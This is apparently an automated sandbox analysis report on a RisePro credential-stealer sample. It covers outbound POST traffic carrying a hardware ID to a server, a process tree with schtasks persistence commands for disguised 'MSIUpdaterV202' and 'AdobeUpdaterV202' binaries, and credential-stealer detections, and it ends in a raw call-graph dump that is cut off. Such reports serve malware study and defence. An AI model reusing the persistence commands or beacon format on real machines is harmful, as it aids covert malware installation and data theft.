                                                                                                                                            2024-04-21 13:31:47 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-04-21 13:31:48 UTC | 812 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:48 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=p13gcp42003vkk63m9mkmvmk07; expires=Thu, 15-Aug-2024 07:18:27 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hyFYCE%2FMA7fxeH7lE3gnUa1f%2B2MAqdmeeQj8%2BqqmFBnDANksx5f6MIj8tX4i6eY59J7oOziniwg3qu0EPCjFAfG5OCiMFWtmVQXImrR0yuenYPRpTD96H7MLuIaX2HEWBkAurdogCTQmzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc837e8b4529-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400



                                                                                                                                            Target ID:0
                                                                                                                                            Start time:15:30:56
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\2q45IEa3Ee.exe"
                                                                                                                                            Imagebase:0xc60000
                                                                                                                                            File size:2'551'616 bytes
                                                                                                                                            MD5 hash:4A36FA7C0CCBC6842C541A6439AB545A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000003.1824382503.0000000005E26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:2
                                                                                                                                            Start time:15:31:19
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c HR" /sc HOURLY /rl HIGHEST
                                                                                                                                            Imagebase:0xdf0000
                                                                                                                                            File size:187'904 bytes
                                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:3
                                                                                                                                            Start time:15:31:19
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:4
                                                                                                                                            Start time:15:31:19
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                            Imagebase:0xdf0000
                                                                                                                                            File size:187'904 bytes
                                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:5
                                                                                                                                            Start time:15:31:19
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:6
                                                                                                                                            Start time:15:31:19
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe"
                                                                                                                                            Imagebase:0x860000
                                                                                                                                            File size:315'904 bytes
                                                                                                                                            MD5 hash:C60F5FA3A579BCA2C8C377F7E15B2221
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            • Detection: 92%, ReversingLabs
                                                                                                                                            • Detection: 77%, Virustotal, Browse
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:7
                                                                                                                                            Start time:15:31:19
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                            Imagebase:0xe10000
                                                                                                                                            File size:65'440 bytes
                                                                                                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:8
                                                                                                                                            Start time:15:31:20
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe
                                                                                                                                            Imagebase:0x4f0000
                                                                                                                                            File size:315'904 bytes
                                                                                                                                            MD5 hash:C60F5FA3A579BCA2C8C377F7E15B2221
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            • Detection: 92%, ReversingLabs
                                                                                                                                            • Detection: 77%, Virustotal, Browse
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:9
                                                                                                                                            Start time:15:31:20
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe
                                                                                                                                            Imagebase:0x270000
                                                                                                                                            File size:315'904 bytes
                                                                                                                                            MD5 hash:C60F5FA3A579BCA2C8C377F7E15B2221
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:10
                                                                                                                                            Start time:15:31:20
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                            Imagebase:0xe90000
                                                                                                                                            File size:65'440 bytes
                                                                                                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:11
                                                                                                                                            Start time:15:31:20
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                            Imagebase:0x20000
                                                                                                                                            File size:65'440 bytes
                                                                                                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1939197101.000000000071D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:14
                                                                                                                                            Start time:15:31:32
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe"
                                                                                                                                            Imagebase:0x8b0000
                                                                                                                                            File size:315'904 bytes
                                                                                                                                            MD5 hash:C60F5FA3A579BCA2C8C377F7E15B2221
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            • Detection: 92%, ReversingLabs
                                                                                                                                            • Detection: 77%, Virustotal, Browse
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:15
                                                                                                                                            Start time:15:31:32
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                            Imagebase:0xdb0000
                                                                                                                                            File size:65'440 bytes
                                                                                                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:16
                                                                                                                                            Start time:15:31:40
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe"
                                                                                                                                            Imagebase:0xe20000
                                                                                                                                            File size:315'904 bytes
                                                                                                                                            MD5 hash:C60F5FA3A579BCA2C8C377F7E15B2221
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:17
                                                                                                                                            Start time:15:31:40
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                            Imagebase:0xf20000
                                                                                                                                            File size:65'440 bytes
                                                                                                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:8.1%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:22.4%
                                                                                                                                              Total number of Nodes:2000
                                                                                                                                              Total number of Limit Nodes:23
c746c2 19239->19241 19240 c746dd 19240->19205 19241->19240 19247 c72e20 19241->19247 19244 c774b1 19243->19244 19245 c77486 19243->19245 19244->19206 19245->19244 19246 c64670 std::_Throw_Cpp_error 15 API calls 19245->19246 19246->19244 19248 c72e57 19247->19248 19249 c72eee 19247->19249 19250 c74690 15 API calls 19248->19250 19249->19240 19251 c72e60 19250->19251 19252 c72edd 19251->19252 19253 c64670 std::_Throw_Cpp_error 15 API calls 19251->19253 19252->19249 19254 c77450 15 API calls 19252->19254 19253->19252 19254->19249 19256 c93ffa std::_Locinfo::_Locinfo_ctor 19255->19256 19257 c94001 19256->19257 19260 c94021 19256->19260 19258 c9bf8f ___std_exception_copy 9 API calls 19257->19258 19259 c94006 19258->19259 19261 c934f0 ___std_exception_copy 14 API calls 19259->19261 19262 c94033 19260->19262 19263 c94026 19260->19263 19264 c94011 19261->19264 19272 ca517f 19262->19272 19265 c9bf8f ___std_exception_copy 9 API calls 19263->19265 19264->17959 19264->18347 19265->19264 19268 c94050 19280 c9408e 19268->19280 19269 c94043 19270 c9bf8f ___std_exception_copy 9 API calls 19269->19270 19270->19264 19273 ca518b std::_Locinfo::_Locinfo_ctor 19272->19273 19284 c9eadb RtlEnterCriticalSection 19273->19284 19275 ca5199 19285 ca5223 19275->19285 19281 c94092 19280->19281 19305 c9baf4 RtlLeaveCriticalSection 19281->19305 19283 c940a3 19283->19264 19284->19275 19293 ca5246 19285->19293 19286 ca529e 19287 ca4eea __Getctype 9 API calls 19286->19287 19289 ca52a7 19287->19289 19290 ca58aa ___std_exception_destroy 9 API calls 19289->19290 19291 ca52b0 19290->19291 19292 ca6084 std::locale::_Setgloballocale 2 API calls 19291->19292 19297 ca51a6 19291->19297 19294 ca52cf 19292->19294 19293->19286 19293->19297 19301 c9bae0 RtlEnterCriticalSection 19293->19301 19302 c9baf4 RtlLeaveCriticalSection 19293->19302 19303 c9bae0 RtlEnterCriticalSection 19294->19303 19298 ca51df 19297->19298 19304 c9eb23 RtlLeaveCriticalSection 19298->19304 19300 c9403c 19300->19268 19300->19269 19301->19293 
19302->19293 19303->19297 19304->19300 19305->19283 19307 c9bca8 19306->19307 19308 c9bcd0 19306->19308 19307->19308 19309 c9bcb5 19307->19309 19310 c9bcd7 19307->19310 19308->18350 19311 c93473 ___std_exception_copy 14 API calls 19309->19311 19314 c9bbf3 19310->19314 19311->19308 19315 c9bbff std::_Locinfo::_Locinfo_ctor 19314->19315 19322 c9bae0 RtlEnterCriticalSection 19315->19322 19317 c9bc0d 19323 c9bc4e 19317->19323 19322->19317 19333 ca713a 19323->19333 19353 ca70fc 19333->19353 19354 ca7108 19353->19354 19479 c97709 19469->19479 19471 c97f8f 19475 c98a60 std::_Locinfo::_Locinfo_ctor 16 API calls 19471->19475 19477 c97fb3 19471->19477 19472 c97f5c 19474 c93473 ___std_exception_copy 14 API calls 19472->19474 19473 c97f47 19473->19471 19473->19472 19478 c97f77 std::_Locinfo::_Locinfo_ctor 19473->19478 19474->19478 19475->19477 19477->19478 19486 c97724 19477->19486 19478->18366 19480 c9770e 19479->19480 19481 c97721 19479->19481 19482 c9bf8f ___std_exception_copy 9 API calls 19480->19482 19481->19473 19483 c97713 19482->19483 19484 c934f0 ___std_exception_copy 14 API calls 19483->19484 19485 c9771e 19484->19485 19485->19473 19487 c97730 19486->19487 19488 c97746 19486->19488 19489 c9edde __Getctype 14 API calls 19487->19489 19492 c97756 19488->19492 19493 ca42c9 19488->19493 19490 c9773b std::_Locinfo::_Locinfo_ctor 19489->19490 19490->19477 19492->19477 19494 c93e3e std::_Locinfo::_Locinfo_ctor 16 API calls 19493->19494 19495 ca42e6 19494->19495 19497 ca42f6 _ValidateLocalCookies 19495->19497 19498 ca9cdb 19495->19498 19497->19492 19499 c93e3e std::_Locinfo::_Locinfo_ctor 16 API calls 19498->19499 19500 ca9cfb 19499->19500 19509 ca5a0a 19500->19509 19502 ca9d28 19504 ca5924 std::_Locinfo::_Locinfo_ctor 10 API calls 19502->19504 19505 ca9db7 _ValidateLocalCookies 19502->19505 19506 ca9d4d std::_Locinfo::_Locinfo_ctor std::locale::_Setgloballocale 19502->19506 19508 ca9d96 19502->19508 19504->19506 19505->19497 19507 ca5a0a std::_Locinfo::_Locinfo_ctor 
MultiByteToWideChar 19506->19507 19506->19508 19507->19508 19512 c8db05 19508->19512 19516 ca5972 19509->19516 19513 c8db0f 19512->19513 19514 c8db20 19512->19514 19513->19514 19515 c9c526 ___std_exception_destroy 9 API calls 19513->19515 19514->19505 19515->19514 19517 ca5983 MultiByteToWideChar 19516->19517 19517->19502 19519 c7b4ce 19518->19519 19521 c7b4f8 std::_Locinfo::_Locinfo_ctor 19518->19521 19520 c636f0 std::_Throw_Cpp_error 15 API calls 19519->19520 19520->19521 19521->18375 19523 c63839 19522->19523 19526 c9b667 19523->19526 19527 c9b67b ___std_exception_copy 19526->19527 19532 c98df5 19527->19532 19529 c9b696 19530 c9322c ___std_exception_copy 14 API calls 19529->19530 19533 c98e21 19532->19533 19534 c98e44 19532->19534 19535 c93473 ___std_exception_copy 14 API calls 19533->19535 19534->19533 19536 c98e4c 19534->19536 19537 c98e39 _ValidateLocalCookies 19535->19537 19541 c9a337 19536->19541 19537->19529 19559 c9b39d 19541->19559 19757 c9781f std::_Locinfo::_Locinfo_ctor 19756->19757 19758 c97829 19757->19758 19759 c9784c 19757->19759 19760 c93473 ___std_exception_copy 14 API calls 19758->19760 19766 c97844 19759->19766 19767 c9bae0 RtlEnterCriticalSection 19759->19767 19760->19766 19846 c75add 19845->19846 19847 c75bb9 19845->19847 19848 c75b50 19846->19848 19849 c75ae4 19846->19849 19850 c75afe 19846->19850 19851 c75b1e 19846->19851 19852 c75b2a 19846->19852 19856 c63260 std::_Throw_Cpp_error 15 API calls 19847->19856 19858 c75ae9 19847->19858 19848->18394 19947 c79470 19849->19947 19857 c8df02 std::_Facet_Register 15 API calls 19850->19857 19952 c7a090 19851->19952 19854 c8df02 std::_Facet_Register 15 API calls 19852->19854 19854->19858 19859 c75bd4 19856->19859 19857->19858 19858->18394 19957 c67270 19859->19957 19861 c75be7 Concurrency::cancel_current_task 19863 c7e98c 19862->19863 20005 c9bbcb 19863->20005 19867 c7874e 19868 c7a800 19867->19868 19869 c7a846 19868->19869 19870 c7aa68 19868->19870 20072 c7b670 19869->20072 20040 c81ed0 19870->20040 
19875 c7c660 17 API calls 19877 c7aa96 19875->19877 19880 c7b7b0 18 API calls 19877->19880 19939 c7ab7a std::_Throw_Cpp_error 19877->19939 19879 c7c660 17 API calls 19881 c7a8a7 19879->19881 19882 c7aae3 19880->19882 19891 c7a9b3 std::_Throw_Cpp_error 19881->19891 20197 c7b7b0 19881->20197 19885 c66670 17 API calls 19882->19885 19883 c75ab0 15 API calls 19884 c7abca 19883->19884 19887 c71940 15 API calls 19884->19887 19889 c7ab07 19885->19889 19886 c7aa63 std::_Throw_Cpp_error 19886->18398 19890 c7abf4 19887->19890 19894 c7bd60 18 API calls 19889->19894 19890->19886 19895 c93500 std::_Throw_Cpp_error 14 API calls 19890->19895 19892 c7aa0f 19891->19892 19896 c75ab0 15 API calls 19891->19896 19897 c71940 15 API calls 19892->19897 19899 c7ab20 19894->19899 19900 c7ac6a 19895->19900 19901 c7a9e5 19896->19901 19902 c7aa1a 19897->19902 19904 c7ac8e 19899->19904 19906 c631c0 std::_Throw_Cpp_error 14 API calls 19899->19906 20293 c76c30 19900->20293 20285 c71940 19901->20285 20288 c71310 19902->20288 19909 c76c30 15 API calls 19904->19909 19911 c7ab3d 19906->19911 19907 c7ac78 Concurrency::cancel_current_task 19920 c93500 std::_Throw_Cpp_error 14 API calls 19907->19920 19912 c7ac99 Concurrency::cancel_current_task 19909->19912 19916 c8f408 ___std_exception_destroy 9 API calls 19911->19916 19925 c93500 std::_Throw_Cpp_error 14 API calls 19912->19925 19919 c7ab53 19916->19919 19917 c7aa4d 19921 c71310 14 API calls 19917->19921 19924 c8f408 ___std_exception_destroy 9 API calls 19919->19924 19920->19904 19928 c7ab6c 19924->19928 19934 c7acac 19925->19934 19930 c631c0 std::_Throw_Cpp_error 14 API calls 19928->19930 19930->19939 19931 c7acd7 std::_Throw_Cpp_error 19931->18398 19934->19931 19935 c93500 std::_Throw_Cpp_error 14 API calls 19934->19935 19937 c7acfc 19935->19937 19937->18398 19939->19883 19939->19890 19939->19912 19941 c7a4eb std::_Throw_Cpp_error 19940->19941 19942 c93500 std::_Throw_Cpp_error 14 API calls 19941->19942 19943 c7a549 std::_Throw_Cpp_error 19941->19943 
19944 c7a571 19942->19944 19943->18400 20650 c7b280 19944->20650 19946 c7a58b 19948 c8df02 std::_Facet_Register 15 API calls 19947->19948 19949 c79493 19948->19949 19950 c8df02 std::_Facet_Register 15 API calls 19949->19950 19951 c794b9 19950->19951 19951->19858 19953 c8df02 std::_Facet_Register 15 API calls 19952->19953 19954 c7a0ca 19953->19954 19955 c634e0 std::_Throw_Cpp_error 15 API calls 19954->19955 19956 c7a10a 19955->19956 19956->19858 19970 c66410 19957->19970 19959 c672f4 19960 c76aa0 std::_Throw_Cpp_error 15 API calls 19959->19960 19961 c67312 std::_Throw_Cpp_error 19960->19961 19963 c67456 19961->19963 19964 c673b9 std::_Throw_Cpp_error 19961->19964 19962 c8f3a5 ___std_exception_copy 15 API calls 19966 c67402 19962->19966 19965 c93500 std::_Throw_Cpp_error 14 API calls 19963->19965 19964->19962 19965->19966 19967 c67438 std::_Throw_Cpp_error 19966->19967 19968 c93500 std::_Throw_Cpp_error 14 API calls 19966->19968 19967->19861 19969 c67460 19968->19969 19969->19861 19991 c647a0 19970->19991 19972 c66453 19973 c66470 19972->19973 19974 c66621 19972->19974 19976 c7b4a0 15 API calls 19973->19976 19975 c63110 std::_Throw_Cpp_error 15 API calls 19974->19975 19990 c664eb std::_Throw_Cpp_error 19975->19990 19977 c6648d 19976->19977 19979 c76aa0 std::_Throw_Cpp_error 15 API calls 19977->19979 19978 c93500 std::_Throw_Cpp_error 14 API calls 19980 c6662b 19978->19980 19981 c664a0 19979->19981 19982 c8f408 ___std_exception_destroy 9 API calls 19980->19982 19996 c7b310 19981->19996 19984 c66646 19982->19984 19986 c8f408 ___std_exception_destroy 9 API calls 19984->19986 19985 c664d8 19987 c76aa0 std::_Throw_Cpp_error 15 API calls 19985->19987 19988 c66655 std::_Throw_Cpp_error 19986->19988 19987->19990 19988->19959 19989 c66602 std::_Throw_Cpp_error 19989->19959 19990->19978 19990->19989 19992 c647b3 19991->19992 19993 c647e5 19992->19993 19994 c634e0 std::_Throw_Cpp_error 15 API calls 19992->19994 19993->19972 19995 c6480b 19994->19995 19995->19972 19997 c7b353 
19996->19997 19998 c7b494 19997->19998 19999 c7b418 19997->19999 20000 c7b358 std::_Locinfo::_Locinfo_ctor 19997->20000 20001 c63110 std::_Throw_Cpp_error 15 API calls 19998->20001 20003 c636f0 std::_Throw_Cpp_error 15 API calls 19999->20003 20000->19985 20002 c7b499 20001->20002 20004 c7b443 std::_Locinfo::_Locinfo_ctor 20003->20004 20004->19985 20006 ca46d2 __Getctype 14 API calls 20005->20006 20007 c9bbd6 20006->20007 20008 ca49bd __Getctype 14 API calls 20007->20008 20009 c7ea88 20008->20009 20010 c7c660 20009->20010 20012 c7c674 20010->20012 20014 c7c6d4 20010->20014 20011 c7cad0 15 API calls 20036 c7c7bc 20011->20036 20016 c854c0 15 API calls 20012->20016 20032 c7c6b2 20012->20032 20013 c7c85c 20015 c7c877 20013->20015 20018 c7c8d5 20013->20018 20019 c7c8f5 20013->20019 20020 c7c911 20013->20020 20021 c7c91e 20013->20021 20022 c7c8b9 20013->20022 20014->20011 20035 c7c764 20014->20035 20015->19867 20016->20032 20017 c7d1e0 15 API calls 20017->20036 20024 c7cb60 15 API calls 20018->20024 20025 c7cb60 15 API calls 20019->20025 20026 c7d3c0 15 API calls 20020->20026 20027 c7cc10 17 API calls 20021->20027 20023 c7cb60 15 API calls 20022->20023 20028 c7c8cf 20023->20028 20029 c7c8ef 20024->20029 20030 c7c90b 20025->20030 20031 c7c918 20026->20031 20033 c7c925 20027->20033 20028->19867 20029->19867 20030->19867 20031->19867 20032->20014 20034 c854c0 15 API calls 20032->20034 20037 c7c748 20032->20037 20033->19867 20034->20037 20035->19867 20036->20013 20036->20015 20036->20017 20039 c854c0 15 API calls 20036->20039 20037->20035 20038 c7dd20 15 API calls 20037->20038 20038->20014 20039->20036 20041 c82eaa 20040->20041 20047 c81f35 std::_Throw_Cpp_error 20040->20047 20042 c7b7b0 18 API calls 20041->20042 20043 c82eeb 20042->20043 20044 c66670 17 API calls 20043->20044 20045 c82f0f 20044->20045 20046 c7bd60 18 API calls 20045->20046 20056 c82f25 std::_Throw_Cpp_error 20046->20056 20050 c827ff std::_Throw_Cpp_error 20047->20050 20051 c83054 20047->20051 20048 c71310 14 
